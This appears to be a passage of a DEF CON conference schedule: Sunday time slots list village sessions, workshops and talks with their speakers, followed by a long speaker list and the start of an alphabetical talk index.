DCW - cont...(09:00-12:59 PDT) - Hands-on IoT firmware extraction and flash forensics - Dennis Giese,Braelynn Luedtke
DCW - cont...(09:00-12:59 PDT) - EMMC BGA Secrets, hack bga memory, no reballing necessary: Learn how to safely remove EMMC memory modules, hack them and then reinstall, without the difficult process of trying to reball the BGA. - Patrick "Gigstorm" Kiley
HRV - Free Ham Radio Exams -
ICSV - (11:30-11:59 PDT) - Intro to Common Industrial Protocol Exploitation - Trevor Flynn
IOTV - (11:30-11:59 PDT) - Unveiling IoT Vulnerabilities: From Backdoors to Bureaucracy - Kai-Ching "Keniver" Wang
MISC - cont...(09:00-11:59 PDT) - Human Registration Open -
MISC - cont...(10:00-13:59 PDT) - Lost & Found -
RTV - cont...(10:00-11:55 PDT) - Attacking Kubernetes: Tools and Tactics to Compromise Your First Cluster - Lenin Alevski
RTV - cont...(10:00-11:55 PDT) - OSINT Challenges - Alex Ackerman,Lee McWhorter,Sandra Stibbards
RTV - cont...(10:00-11:45 PDT) - Ask a Hiring Manager with Troy Fridley - Troy Fridley
RTV - cont...(10:00-11:45 PDT) - Ask a Hiring Manager with Cory Wolff - Cory Wolff
RTV - cont...(10:00-11:45 PDT) - Ask a Hiring Manager with Peter Hefley - Peter Hefley
SEV - cont...(10:00-11:30 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(10:45-11:30 PDT) - Cold Calls -
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 12:00 PDT


Return to Index  -  Locations Legend
- cont...(10:00-12:59 PDT) - Sticker Swap -
ADV - TotalTest 2.Oh!: Unleashing a Testing Program to Break Smarter, Measure Better, and Fund Your Fixes - Nebu Varghese
ADV - Letthemin: Facilitating High-Value Purple Teams Using an Assumed Compromise Approach - Sarah Hume
BBV - Bug Bounty Village CTF Walkthrough - CTF.ae
CON - cont...(10:00-12:59 PDT) - Hac-Mac Contest Booth Open -
CON - Hac-Man - Remote play available -
CON - Hac-Man - Remote play available -
CON - Hac-Man - Remote play available -
CPV - (12:30-12:59 PDT) - Crypto Privacy Village: Closing Remarks - Crypto Privacy Village Staff
CRE - Self Custodial Wallet Use - HalFinneyIsMyHomeBoy
CRE - Passing the Torch: Mentoring and Protecting Our Students in Education Spaces - Sam Comini,Navaar Johnson
CRE - cont...(10:00-13:59 PDT) - Memorial Chamber Open -
DCT - Phrack Panel -
DCT - Turning your Active Directory into the attacker’s C2: modern Group Policy Objects enumeration and exploitation - Quentin "croco_byte" Roland,Wilfried "tiyeuse" Bécard
DCT - cont...(11:30-12:15 PDT) - Passkeys Pwned: Turning WebAuthn Against Itself - Shourya Pratap Singh,Jonny Lin,Daniel Seetoh
DCT - (12:30-13:15 PDT) - Win-DoS Epidemic: A crash course in abusing RPC for Win-DoS & Win-DDoS - Or "oryair1999" Yair,Shahak Morag
DCT - cont...(11:30-12:15 PDT) - Breaking Wi-Fi Easy Connect: A Security Analysis of DPP - George "sophron" Chatzisofroniou
DCT - (12:30-13:15 PDT) - Silent Signals: Exploiting Security and Privacy Side-Channels in End-to-End Encrypted Messengers - Gabriel Gegenhuber,Maximilian Günther
DCT - Carding, Sabotage & Survival: A Darknet Market Veteran’s Story - Godman666
DCW - cont...(09:00-12:59 PDT) - DIY Malware Emulation: Build It, Break It, Detect It - Sebastian Tapia,Ricardo Sanchez
DCW - cont...(09:00-12:59 PDT) - Provably exfiltrating data by breaking TLS in the right ways - AtHeartEngineer,Sinu
DCW - cont...(09:00-12:59 PDT) - Hacking the connected plant: AI edition! - Arnaud Soullié,Alexandrine TORRENTS
DCW - cont...(09:00-12:59 PDT) - Creating malicious functional app on Android - HackeMate
DCW - cont...(09:00-12:59 PDT) - Cloud Forensics Workshop: Smart Grid Edition - Kerry "Professor Kilroy" Hazelton
DCW - cont...(09:00-12:59 PDT) - Disrupting Digital Dataflows: A 101 on how 2 detect, analyze, & disrupt digital systems by reverse engineering real-world Electronic Warfare techniques from Ukraine at the hardware level - Preston Zen
DCW - cont...(09:00-12:59 PDT) - Hands-on IoT firmware extraction and flash forensics - Dennis Giese,Braelynn Luedtke
DCW - cont...(09:00-12:59 PDT) - EMMC BGA Secrets, hack bga memory, no reballing necessary: Learn how to safely remove EMMC memory modules, hack them and then reinstall, without the difficult process of trying to reball the BGA. - Patrick "Gigstorm" Kiley
HHV - (12:30-12:59 PDT) - The Power(Point) Glove - Parsia "CryptoGangsta" Hakimian
HRV - cont...(11:00-12:59 PDT) - Free Ham Radio Exams -
ICSV - (12:30-12:59 PDT) - The Worst ICS/OT Love Story Ever Told - Mike Holcomb
IOTV - Smart Devices, Dumb Resets? Testing Firmware Persistence in Commercial IoT - Matei Josephs
IOTV - Firmware Decryption: For, and By, the Cryptographically Illiterate - Craig Heffner
MHV - (12:30-12:59 PDT) - Red Alerts and Blue Oceans: Incident Response from a Sysadmin’s War Room in Maritime Ops - Capt. Kit Louttit,Steve Winston
MISC - cont...(10:00-13:59 PDT) - Lost & Found -
PGE - Friends of Bill W -
PLV - (12:30-12:59 PDT) - Legalizing Ethical Hacking: A Global Safe Harbor for Security Research - Miracle "OWOLABI" Abiodun
PSV - Airport Security! - S01 E008 - Breaking into your baggage - Hector Cuevas Cruz
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 13:00 PDT


Return to Index  -  Locations Legend
BBV - Bug Bounty Village CTF Awards - Bug Bounty Village Staff,CTF.ae
BBV - (13:30-13:59 PDT) - Bug Bounty Village Closing Ceremony - Bug Bounty Village Staff
CRE - cont...(12:00-13:50 PDT) - Self Custodial Wallet Use - HalFinneyIsMyHomeBoy
CRE - cont...(10:00-13:59 PDT) - Memorial Chamber Open -
DCT - cont...(12:30-13:15 PDT) - Win-DoS Epidemic: A crash course in abusing RPC for Win-DoS & Win-DDoS - Or "oryair1999" Yair,Shahak Morag
DCT - (13:30-13:50 PDT) - Planting C4: Cross-Compatible External C2 for All Your Implants - Scott "ScottCTaylor12" Taylor
DCT - cont...(12:30-13:15 PDT) - Silent Signals: Exploiting Security and Privacy Side-Channels in End-to-End Encrypted Messengers - Gabriel Gegenhuber,Maximilian Günther
DCT - (13:30-14:15 PDT) - SCCM: The tree that always bears bad fruits - Mehdi "kalimer0x00" Elyassa
DCT - Unexpected Connections: How a vulnerability in obscure dealer software could have unlocked your car from anywhere - Eaton Zveare,Roshan Piyush
DCT - (13:30-14:59 PDT) - Contest Closing Ceremonies & Awards -
MISC - cont...(10:00-13:59 PDT) - Lost & Found -
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 14:00 PDT


Return to Index  -  Locations Legend
DCT - Loading Models, Launching Shells: Abusing AI File Formats for Code Execution - Cyrus Parzian
DCT - cont...(13:30-14:15 PDT) - SCCM: The tree that always bears bad fruits - Mehdi "kalimer0x00" Elyassa
DCT - How to Fake a Badge like a Pro: 11 Tips to Counterfeiting Event Credentials - Russell Phillips
DCT - cont...(13:30-14:59 PDT) - Contest Closing Ceremonies & Awards -
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 15:00 PDT


Return to Index  -  Locations Legend
DCT - DEF CON Closing Ceremonies & Awards - Jeff "The Dark Tangent" Moss
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 16:00 PDT


Return to Index  -  Locations Legend
DCT - cont...(15:00-17:59 PDT) - DEF CON Closing Ceremonies & Awards - Jeff "The Dark Tangent" Moss
MWV - Exposing Infosec Frauds and Foreign Agents Behind Mercenary Spyware Disinformation - Cthulhu
TRN - cont...(08:00-16:59 PDT) - Influence Operations: Tactics, Defense, and Exploitation - Tom Cross,Greg Conti

 

Sunday - 17:00 PDT


Return to Index  -  Locations Legend
DCT - cont...(15:00-17:59 PDT) - DEF CON Closing Ceremonies & Awards - Jeff "The Dark Tangent" Moss

Speaker List


EdD
EdD
Tung 123ojp
“K” Singh
“K” Singh
1nfocalypse
4dw@r3
Aamiruddin Syed
Aaron "ironcat" Rosenmund
Aaron "KNOX" James
Aaron "KNOX" James
Aaron "scriptingxss" Guzman
Aaron Boyd
Aaron Hogan
Aaron Wasserman
Aaron Wasserman
Aastha Sahni
Abdel Sy Fane
Abhijith "Abx" B R
Abhijith "Abx" B R
Abhijith "Abx" B R
Abhinav Khanna
Abhinav Khanna
Abhinav Pandagale
Abhinav Pandagale
Abhinav Singh
Abhinav Singh
Abraham Aranguren
Abraham Aranguren
Adam "BuildHackSecure" Langley
Adam "pi3" Zabrocki
Adam "UNC1739" Crosser
Adam "UNC1739" Crosser
Adam "UNC1739" Crosser
Adam Batori
Adam Pennington
Adam Robbie
Adam Segal
Adam915
Adel Karimi
Adnan Khan
Adrien Ogee
Adwiteeya Agrawal
Afonso Tinoco
Agostino "Van1sh" Panico
Agostino "Van1sh" Panico
Akib Sayyed
Alejandro "0xedh" Hernando
Alejandro "TheMalwareGuardian" Vazquez
Alek Amrani
Alessandro Di Federico
Alessandro Di Federico
Alessandro Grisa
Alessandro Strino
Alethe Denis
Alex "cheet" Delifer
Alex Ackerman
Alex Bernier
Alex Holden
Alex Matrosov
Alexandrine TORRENTS
Alexandru Lazar
Alexis Cao
Alexis Hancock
Alfie Champion
Allan Friedman
Alon "alon_leviev" Leviev
Alyssa Coley
Amal Graafstra
Amelia Shapiro
Amp
Anant Shrivastava
Anant Shrivastava
Anchises Moraes
Andrea Downing
Andrea
Andrew "Helicopters of DC" Logan
Andrew "Spike" Brandt
Andrew Brandt
Andrew Case
Andrew Cockburn
Andrzej Olchawa
Andy Hull
Anil Celik
Anil Celik
Anirudh Anand
Anirudh Anand
Anissa Elias
Anıl Çelik
Anmol "Fr13nd0x7f" K. Sachan
Anmol "Fr13nd0x7f" K. Sachan
Anna Pham
Anna portasynthinca3 Antonenko
Anthony "Coin" Rose
Anthony "Coin" Rose
Anthony Silva
Antoine Goichot
Apurv "ASG_Sc0rpi0n" Singh Gautam
Apurv "ASG_Sc0rpi0n" Singh Gautam
Archwisp
Arda Büyükkaya
Arjun "T3R4_KAAL" Chaudhary
Arjun "T3R4_KAAL" Chaudhary
Arjun "T3R4_KAAL" Chaudhary
Arjun "T3R4_KAAL" Chaudhary
Arnaud Soullié
Arnaud Soullié
Arnaud Soullié
Asher Davila
Ashwin Iyer
Ashwin Shenoi
Ashwin Shenoi
Ata Seren
Ata Seren
AtHeartEngineer
Audrey Adeline
Austin Norby
Austin Reid
Austin Worline
Aviad Gispan
Aviad Hahami
AviNash Srinivasan
Ayaan Qayyum
Ayaan Qayyum
Ayman Boulaich
Ayman Elsawah
Ayman Elsawah
Ayodele Ibidapo
Ayodele Ibidapo
Babak Javadi
Babak Javadi
Barb Hirz
Barrett Darnell
Ben "nahamsec" Sadeghipour
Ben "nahamsec" Sadeghipour
Ben "nahamsec" Sadeghipour
Ben "nahamsec" Sadeghipour
Ben "polygonben" Folland
Ben "polygonben" Folland
Ben Gardiner
Ben Gardiner
Ben Hawkins
Ben Nassi
Benjamin "bmixonbaca" Mixon-Baca
Benjamin "Cave Twink" Woodill
Benjamin Walny
Benjamin Walny
Bill Demirkapi
Bleon "Gl4ssesbo1" Proko
Bleon "Gl4ssesbo1" Proko
Bob Coecke
Bobby Graydon
Bobby Kuzma
Bobby Thomas
Bobby Thomas
Borja "borjmz" Martinez
Brad Ammerman
Braelynn Luedtke
Bramwell Brizendine
Bramwell Brizendine
Brandon Bailey
Brent "TheDukeZip" Dukes
Brent Harrell
Brent Muir
Brent White
Bret Fowler
Brian Baskin
Brian Burnett
Bruno "BrunoModificato" Halltari
Bryan Black
Bryan Black
Bug Bounty Village Staff
Bug Bounty Village Staff
Cale "calebot" Smith
Capt. Kit Louttit
Carey Parker
Carl Miller
Carson Green
Casey Edman
Cernica Ionut Cosmin
César Ramirez 
Cesare "Red5heep" Pizzi
Cesare "Red5heep" Pizzi
Cesare "Red5heep" Pizzi
Chad Calease
Chad Spensky
Chelsea Button
Chelsea Button
Chelsea Button
Chen Levy Ben Aroy
Chiao-Lin "Steven Meow" Yu
Chiao-Lin "Steven Meow" Yu
Chiao-Lin "Steven Meow" Yu
Chistopher Lopez
Chloe Chong
Chris DeCarmen
Chris DeCarmen
Chris DeCarmen
Chris Greer
Chris Monteiro
Christophe Tafani-Dereeper
Christopher "xoreaxeaxeax" Domas
Christopher Dio Chavez
Christopher Nourrie
Coby Abrams
CoD_Segfault
CoD_Segfault
Cody Hein
Cody Hein
collin
Constantine Macris (TheDini)
Cooper "CyberTiger" Quintin
Cooper "CyberTiger" Quintin
Cooper "CyberTiger" Quintin
Corey Ball
Corey Ball
Cory Wolff
Craig Heffner
Cronkitten
Crypto Privacy Village Staff
Crypto Privacy Village Staff
Crypto Privacy Village Staff
Crypto Privacy Village Staff
Crypto Privacy Village Staff
CTF.ae
CTF.ae
Cthulhu
Cthulhu
Cybelle Oliveira
Cyrus Parzian
Dakshitaa Babu
Dakshitaa Babu
Dan Bongiorno
Dan Goga
Dan Pelegro
Dan
Dane Sherrets
Daniel "Varx" Beard
Daniel "Varx" Beard
Daniel Baker
Daniel Benavides
Daniel Cuthbert
Daniel Donze
Daniel Isler
Daniel Koranek
Daniel Marques
Daniel Reilly
Daniel Seetoh
Daniel Ward
Daniel Ward
Daniele Antonioli
Danilo Erazo
Data
David "johnnyspandex" Cash
David "Votd_ctf" Wearing
David "Votd_ctf" Wearing
David Rushmer
Dawid Czagan
Dawid Czagan
Dawn Song
Debasis Parida
Denis Smajlović
Dennis Giese
Deputy Minister Herming Chiueh
Desiree Wilson
Deviant Ollam
Deviant Ollam
Deviant Ollam
Devon Colmer
Devon Colmer
Dhiraj Mishra
Dhiraj Mishra
Diego "djurado" Jurado
Diego "rehrar" Salazar
Dimitri "GlenX" Di Cristofaro
Dimitri "GlenX" Di Cristofaro
Dirk-jan Mollema
Dong-Yi "Kazma Ye" Ye
Dr. Ahmet Furkan Aydogan
Drinor Selmanaj
Drinor Selmanaj
Eaton Zveare
Eaton Zveare
Eddie Rios
Edward "Actuator" Warren
Edward Crowder
Edward Landers
Ege Feyzioglu
eigentourist
Eijah
Elaine Shi
Elaine Shi
Elisa Gangemi
Elizabeth Biddlecome
Elizabeth Biddlecome
Elizabeth Biddlecome
Elizabeth Biddlecome
Elizabeth Biddlecome
Elizabeth Biddlecome
Elizabeth Biddlecome
Elizabeth Biddlecome
Elizabeth Biddlecome
Elizabeth Biddlecome
Elliot Chernofsky
Elliot Chernofsky
Emily Fane
Emma Fang
Emma Stewart
Emre Odaman
Emre Odaman
Emre Odaman
Endrit Shaqiri
Endrit Shaqiri
Endrit Shaqiri
Enrico Faccioli
Enzo Damato
Eric Woodruff
Eric Woodruff
Erlend Leiknes
Erwin "Dollarhyde" Karincic
Espen Torseth
Estelle Ruellan
Eugene "spaceraccoon" Lim
Eugene "spaceraccoon" Lim
Eugene "spaceraccoon" Lim
Eva Benn
Ezra "Shammahwoods" Woods
Ezra "Shammahwoods" Woods
Ezz Tahoun
Ezz Tahoun
Ezz Tahoun
Ezz Tahoun
Ezz Tahoun
Farid Zakaria
Farzan Karimi
Federico Lucifredi
Federico Valentini
Filipi Pires
fir3d0g
Fotis Chantizis
Francisco Perdomo
Fredrik Sandström
Furkan Aydogan
Gabi Joseph
Gabriel Gegenhuber
Gabriel Nitu
Gannon "Dorf" Gebauer
Garrett Freibott
Garrett Freibott
Garrett Gee
Garrett Gee
Gary Kao
Gaston Aznarez
Gecko
George "sophron" Chatzisofroniou
George Hughey
George
Gijs Rijnders
Giorgio "gbyolo" Bernardinetti
Giorgio "gbyolo" Bernardinetti
Giovanni Cruz Forero
Giustina Kent
Godman666
Goshak
Grace "Baelfire" Parrish
Graham Helton
Greg Conti
Greg Conti
Greg Conti
Greg Conti
Greg Conti
Greg Hatcher
Greg Hatcher
Gregory Carpenter
Gunnar "g0lden" Andrews
HackeMate
HalFinneyIsMyHomeBoy
Hannah Zhao
Harini Ramprasad
Harrison "rs0n" Richardson
Harrison Sand
HD Moore
Hector Cuevas Cruz
Hubert Lin
Hugo van den Toorn
Huseyn "Khatai" Gadashov
Huseyn "Khatai" Gadashov
Hydrox
Hydrox
Ibai Castells
Ileana Barrionuevo
Ilkin Javadov
Inti "intidc" De Ceukelaire
Inti "intidc" De Ceukelaire
Irene Mo
Irvin Lemus
Irvin Lemus
Irvin Lemus
Irvin Lemus
Irvin Lemus
Irvin Lemus
Irvin Lemus
Irvin Lemus
Irvin Lemus
Irvin Lemus
Isaac Soon
Isabel Straw
Jack Heysel
Jack Heysel
Jack Heysel
Jack Voltaic
Jack Voltaic
Jacob Avidar
Jae Young Kim
Jae Young Kim
Jake "Hubble" Krasnov
Jake "Hubble" Krasnov
Jake "Hubble" Krasnov
Jake "Hubble" Krasnov
Jake Braun
Jake Mayhew
Jake Mayhew
James "albinowax" Kettle
James Hawk
James Rice
James Rowley
James Utley
Jan "SP3ZN45" Berens
Jan "SP3ZN45" Berens
Janet Vertesi
Jasmin "JR0ch17" Landry
Jasmin "JR0ch17" Landry
Jason "jhaddix" Haddix
Jason Andress
Jason Vogt
Javan Rasokat
Jay Dancer
Jaya Baloo
Jayson E Street
Jayson E. Street
Jayson E. Street
Jeff "caffix" Foley
Jeff "The Dark Tangent" Moss
Jeff "The Dark Tangent" Moss
Jeff Jordan
Jennifer Schieferle Uhlenbrock
Jesse Michael
Jeswin Mathai
Jeswin Mathai
Ji'an "azraelxuemo" Zhou
Ji'an "azraelxuemo" Zhou
Jianjia Yu
Jianqiang (Stark) Li
Jimmy Wylie
Joe "Juno" Aurelio
Joe "securelyfitz" FitzPatrick
Joel "niemand_sec" Noguera
Joey Dreijer
John "Jlo" Lopes
John Andre Bjørkhaug
John Andre Bjørkhaug
John Fokker
John Johnson
John McIntosh
John McIntosh
Johnny Xmas
Jon DiMaggio
Jon DiMaggio
Jon McCoy
Jonathan Coradi
Jonathan Elkabas
Jonathan Elkabas
Jonny Lin
Jordan Bonagura
Jordan Kasper
Jordan Macey
Jorge Acevedo Canabal
José Gómez
Jose Plascencia
Josep Albors
Joseph "stoppingcart" Gabay
Joseph Davis
Joseph Lim
Joseph
Josh Huff
Josh Millsap
Josh Stiebel
Joshua "jstrosch" Stroschein
Joshua "jstrosch" Stroschein
Joshua "jstrosch" Stroschein
Joshua "jstrosch" Stroschein
JP Ausmasson
Juanma "M4C" Tejada
Juanma "M4C" Tejada
Jugal Patel
Juho Jauhiainen
Julian "Julez" Dunning
Jun “Ghost Hacker” Kawasaki
Junming "Chapoly1305" Chen
Junming "Chapoly1305" Chen
Justin "rhynorater" Gardner
Justin "rhynorater" Gardner
Justin W. Lin
Kai-Ching "Keniver" Wang
Kai-Ching "Keniver" Wang
Kai-Ching "Keniver" Wang
Kaitlyn Handelman
Kaitlyn Handelman
Kaitlyn Handelman
Kaitlyn Handelman
Kaitlyn Handelman
Kaitlyn Handelman
Kaitlyn Handelman
Kaitlyn Handelman
Kaitlyn Handelman
Kaitlyn Handelman
Kamel Ghali
Kamel Ghali
Kara Nance
Karen Ng
Karthik Tadinada
Katarina Amrichova
Katie "InsiderPhD" Paxton-Fear
Katie "InsiderPhD" Paxton-Fear
Katie "InsiderPhD" Paxton-Fear
KC Wong
Keane Lucas
Keanu "RedByte" Nys
Keenan Skelly
Ken Johnson
Ken Johnson
Kenneth Miltenberger
Kenny Hess
Kenny Hess
Kerry "Professor Kilroy" Hazelton
Kevin Clark
Kevin Clark
Kevin Clark
Kevin Clark
Kevin Clark
Kevin Shi
Kevin Shi
Klaus Agnoletti
Konstantinos Karagiannis
Korstiaan Stam
Korstiaan Stam
Krity Kharbanda
Kyle "d4rksystem" Cucci
Kyle "d4rksystem" Cucci
Kyle "d4rksystem" Cucci
Kyle Smathers
Kyle Smathers
Langston Clements
Laura S. Scherling
Laura S. Scherling
Lauren Pace
Lauren Proehl
Lee McWhorter
Lee McWhorter
Lee McWhorter
Leigh Trinity
Leigh-Anne Galloway
Leigh-Anne Galloway
Leigh-Anne Galloway
Lena "LambdaMamba" Yu
Lena "LambdaMamba" Yu
Lena "LambdaMamba" Yu
Lenin Alevski
Lenin Alevski
Leon "leonjza" Jacobs
Lexie "L3xic0n" Thach
Lexie "L3xic0n" Thach
Lior Adar
Lior ZL
Lisa Femia
Lishuo "ret2ddme" Song
Logan Cannan
Loudmouth Security
Loudmouth Security
Luke Cycon
Luke Szramowski
M0nkeyDrag0n
M0nkeyDrag0n
Madhu "madhuakula" Akula
Madhu "madhuakula" Akula
Madhu "madhuakula" Akula
Madhu "madhuakula" Akula
Madhu "madhuakula" Akula
Mahmut "ErdemOzgen" Erdem Ozgen
Mahmut "ErdemOzgen" Erdem Ozgen
MakeItHackin
Maksim Shudrak
Manish Gupta
Mansoor Ahmad
Manthan
Manthan
Marcell Szakály
Marcell Szakály
Marcelo Ribeiro
Marco Casagrande
Marek Tóth
Maria "drkrysSrng" San Jose
Marius Fleischer
Marius Muench
Mark "LargeCardinal" Carney
Mark Omo
Marko Mitic
Martin "tincho_508" Doyhenard
Martyn Higson
Matei Josephs
Matt Cheung
Matt Cheung
Matt Cheung
Matt Gaffney
Matt Holland
Matt Muir
Matthew Cancilla
Mauro Eldritch
Mauro Eldritch
Mauro Eldritch
Max "Libra" Kersten
Max Bazalii
Maximilian Günther
Megan Squire
Meghan Jacquot
Mehdi "kalimer0x00" Elyassa
Mehmet Önder Key
Mehmet Önder Key
Melanie "Goldfishlaser" Allen
Melanie "Goldfishlaser" Allen
Micah "micahflee" Lee
Micah "micahflee" Lee
Michael "Bluescreenofwin" Glass
Michael "Bluescreenofwin" Glass
Michael "bouncyhat" Weber
Michael "codingo_" Skelton
Michael "MSvB" Schloh von Bennewitz
Michael "MSvB" Schloh von Bennewitz
Michael "mtu" Torres
Michael "v3ga" Aguilar
Michael "v3ga" Aguilar
Michael DeVolld
Michael Donley
Michael Frank
Michael Gianarakis
Michael Odell
Michael Sulmeyer
Michael Tassey
Michelle Lopez
Mickey Shkatov
Mike "CroodSolutions" Manrod
Mike "CroodSolutions" Manrod
Mike Holcomb
Mike Lisi
Mike Raggo
Mikko Hypponen
Milenko Starcik
Miracle "OWOLABI" Abiodun
Mishaal Khan
MJ Casado
Monnappa "Monnappa22" K A
Monnappa "Monnappa22" K A
Monnappa "Monnappa22" K A
Monnappa "Monnappa22" K A
Moses Frost
MrBill
MrBill
Mrigakshi Goel
Muhammad Mudassar Yamin
Muhammad Mudassar Yamin
Munir Muhammad
Munir Muhammad
Nathan Case
Nathan Case
Natyra Shaqiri
Natyra Shaqiri
Natyra Shaqiri
Navaar Johnson
Nebu Varghese
Nelson Colón
Nelson Colón
Netanel Ben Simon
Neumann "scsideath" Lim
Nicholas Fredericksen
Nick "c7five" Percoco
Nick Aleks
Nick Copi
Nikhil
Nikhil
Nikhil
Nikhil
Noah Holland
Noam Moshe
Noel Wong
nyx
oblivion
Octavio Gianatiempo
Olivier Bilodeau
Omar Hamoudeh
Omar Hamoudeh
Omar Santos
Omar Santos
oopsbagel
oopsbagel
Or "oryair1999" Yair
Or "oryair1999" Yair
Or Eshed
Or Sahar
Ori David
PamirAI
Param D Pithadia
Param D Pithadia
Parsia "CryptoGangsta" Hakimian
Parsia "CryptoGangsta" Hakimian
Pat Patterson
Pat Patterson
Patrick "Gigstorm" Kiley
Patrick Walsh
Patrick Wardle
Patrick Wardle
Patrick Wardle
Patrick Wardle
Paul "6mile" McCarty
Paul McCarty
Paulino Calderon
Peter Hefley
Philip "Soldier of FORTRAN" Young
Philip Dunsey
Philippe "phLaul" Laulheret
Pietro Fezzardi
Pietro Fezzardi
Portswigger
Pratik Lotia
Preston Zen
Priyanka Joshi
Qiang Zeng
Qiang Zeng
Qidan "flanker_hqd" He
Quentin "croco_byte" Roland
Quinn Dombrowski
Rachael Tubbs
RADM John Mauger
Rafael Felix
Rafael Felix
Randy Pargman
Raunak Parmar
Raunak Parmar
Ravi Rajput
Ray "CURZE$" Cervantes
Ray "CURZE$" Cervantes
Rear Admiral John Mauger
Rebecah Miller
Red Team Village Staff
Rey "Privesc" Bango
Rey "Privesc" Bango
Rey "Privesc" Bango
Reynaldo "buh0"
Ricardo Fradique
Ricardo Sanchez
Rich "Buffaloverflow" Warren
Rich Compton
Richard "HeadlessZeke" Lawshae
Richard "neuralcowboy" Thieme
Richard "richeeta" Hyunho Im
Richard "richeeta" Hyunho Im
Richard Shmel
Richard Shmel
Rigo Salazar
Rik Chatterjee
Rishi "rxerium" Chudasama
Ritika Verma
Rob King
Robert "LambdaCalculus" Menes
Robert "nytr0gen" Vulpe
Robert Pafford
Robert Pimentel
Roberto Soares
Rod Soto
Rod Soto
Rodney Beede
Roee Idan
Roger "arma" Dingledine
Rohit Mothe
Ron Ben Yizhak
Ronald González
Roni "lupin" Carta
Roshan Piyush
Rosie "Lady Cyber Rosie" Anderson
Royce Yaezenko
Ruben Gonzalez
Ruben Gonzalez
Ruchira Pokhriyal
Russell Phillips
Ryan "0day" Montgomery
Ryan "rj_chap" Chapman
Ryan Emmons
Ryan Holeman
Ryan Mitchell
Ryan Nolette
Sajan Shetty
Sajan Shetty
Sajan Shetty
Sajan Shetty
Sam "erbbysam" Erb
Sam Bowne
Sam Bowne
Sam Bowne
Sam Bowne
Sam Bowne
Sam Bowne
Sam Bowne
Sam Bowne
Sam Bowne
Sam Bowne
Sam Collins
Sam Comini
Sam Hanson
Samuel Gasparro
Samuel Gasparro
Sandra Stibbards
Sandra Stibbards
Sanjeev Sharma
Sarah Hume
Sarah Powazek
Sasuke "Element138" Kondo
Sasuke "Element138" Kondo
Savannah Lazzara
Scott "ScottCTaylor12" Taylor
Scott "ScottCTaylor12" Taylor
Scott "ScottCTaylor12" Taylor
Scott Shackleford
Sean Marquez
Sean Marquez
Sean Prescott
Sebastian Köhler
Sebastian Köhler
Sebastian Tapia
Seongsu Park
Seth Law
Seth Law
Shahak Morag
Shane Krause
Shang-De "HackerPeanutJohn" Jiang
Sharlene Toney
Shawn
Shlomie Liberow
Shota "Sh1n0g1" Shinogi
Shota "Sh1n0g1" Shinogi
Shourya Pratap Singh
Shourya Pratap Singh
Shourya Pratap Singh
Shu-Hao
Sigusr Polke
Sinu
Sky Gul
Skyler Knecht
Skyler Knecht
Skyler Knecht
Sohum Thakkar
SolaSec
Spencer "ZeroSteiner" McIntyre
Spencer "ZeroSteiner" McIntyre
Spencer "ZeroSteiner" McIntyre
Spencer Koch
Stav Cohen
Stephanie Corvese
Stephanie Doyle
Stephanie Doyle
Stephen Bono
Steve Winston
Sydney Marrone
Tal "TLP" Peleg
Tal Skverer
Tanya "SheHacksPurple" Janca
Tapan Khilnani
Ted Carefoot
Temel Demir
Thomas "fr0gger_" Roccia
Thomas "XM20" Xuan Meng
Thomas "XM20" Xuan Meng
Thomas Pope
Thorin Klosowski
Tib3rius
Tim Clevenger
Tim Fowler
Tim Roberts
Tobias "ItsSixtyNein" Diehl
Tom Berek
Tom Chothia
Tom Cope
Tom Cross
Tom Cross
Tom Cross
Tom Cross
Tom Cross
Tom Tervoort
Tomer Nahum
Tomer Nahum
Tomer Nahum
Tomer Nahum
Tony Turner
Tony Webber
Tony Webber
Travis Goodspeed
Trevor Flynn
Troy Fridley
Tung-Lin "Echo Lee" Lee
Tyler Bertles
Tyler Ramsbey
Tyson Laa Deng
Utku Sen
Utku Sen
utvecklas
Valerio "MrSaighnal" Alessandroni
Vanshal Gaur
Veronika
Victoria "V__Wave" Kumaran
Vince Sloan
Vince Sloan
Vincent "Vinnybod" Rose
Vincent "Vinnybod" Rose
Vincent "Vinnybod" Rose
Vishal "Vish" Thakur
Vishal "Vish" Thakur
Vishal "Vish" Thakur
Vlad Iliushin
Vlatko Kosturjak
Wei Hong
Weihan Goh
Wes Thurner
Wesley McGrew
Wesley McGrew
Wesley McGrew
Whit "un1tycyb3r" Taylor
Wilfried "tiyeuse" Bécard
Will Baggett
Will McCardell
Will McCardell
Will McGraw
Will Thomas
William Giles
William Giles
Woody
Xian Xiang Chang
Xian Xiang Chang
Yael Grauer
Yago Lizarribar
Yann Allain
Yariv Tal
Yash Bharadwaj
Ying Zhu
Yoann "OtterHacker" DEQUEKER
Yoann "OtterHacker" DEQUEKER
Yoav Magid
Young Seuk Kim
Yuval Gordon
Yvonne "Von Marie" Cervantes
Yvonne "Von Marie" Cervantes
Zane "earl" Hoffman
Zhengyu Liu
ZiYang "lz2y" Li
Zoltan "zh4ck" Balazs
Zoziel Freire
Zubin Devnani
Zubin Devnani

Talk List


"We are currently clean on OPSEC": The Signalgate Saga - DCT
#ReclaimTech - A community movement - CRE
10 Lessons from the Frontlines of AI Vishing: From Zero to (Almost) Hero - SEV
10 Years of IoT Village: Insights in the World of IoT - IOTV
64-bit Intel Assembly Language Programming for Hackers - DCW
7 Vulns in 7 Days: Breaking Bloatware Faster Than It’s Built - DCT
A Complete Practical Approach to Malware Analysis & Threat Hunting Using Memory Forensics - TRN
A Complete Practical Approach to Malware Analysis & Threat Hunting Using Memory Forensics - TRN
A Look into Using Native Godot Calls to Create Malware - RTV
A Practical Approach to Breaking & Pwning Kubernetes Clusters - TRN
A Practical Approach to Breaking & Pwning Kubernetes Clusters - TRN
A Tale of Weeds and Roses: Propagating the Right Data Protection Agreements with Vendors - CPV
Accelerating Malware Analysis with WinDbg Time Travel Debugging - DCW
Access Control Done Right the First Time - PSV
accessDenied: Step Into the Scenario. Deal the Consequences. - BHV
accessDenied: Step Into the Scenario. Deal the Consequences. - BHV
Active Directory Attacks for Red and Blue Teams - Advanced Edition - TRN
